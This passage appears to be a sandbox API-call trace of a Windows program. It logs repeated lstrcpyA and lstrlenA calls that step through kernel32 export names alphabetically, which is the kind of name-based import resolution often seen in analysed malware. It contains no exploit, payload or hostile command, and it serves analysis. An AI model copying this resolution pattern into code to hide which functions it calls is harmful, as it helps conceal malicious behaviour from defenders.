returned="CreateActCtxA" [0086.203] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.203] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.203] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.203] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.203] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.203] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.203] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.203] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.203] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.203] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.203] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.204] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.204] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.204] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.204] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.204] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.204] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.204] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.204] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.204] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.204] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.204] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.204] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.204] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.204] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.204] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.204] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.204] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.204] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.204] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.205] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.205] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.205] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.205] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.205] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.205] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.205] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.205] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.205] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.205] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.205] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.205] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.205] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.205] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.205] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.205] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.205] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.205] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.205] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.205] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.206] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.206] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.206] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.206] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.206] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.206] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.206] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.206] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.206] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.206] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.206] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.206] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.206] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.206] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.206] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.206] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.206] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.206] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.206] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.206] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.207] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.207] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.207] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.207] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.207] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.207] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.207] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.207] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.207] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.207] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.207] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.207] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.207] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.207] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.207] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.207] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.207] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.207] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.207] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.208] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.208] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.208] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.208] lstrlenA (lpString="DELETEATOM") returned 10 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.208] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.208] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.208] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.208] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.208] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.208] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.208] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.208] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.208] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.208] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.208] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.208] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.208] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.208] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.208] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.209] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.209] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.209] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.209] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.209] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.209] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.209] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.209] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.209] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.209] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.209] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.209] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.209] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.209] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.209] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.209] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.209] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.209] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.209] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.209] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.210] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.210] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.210] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.210] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.210] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" 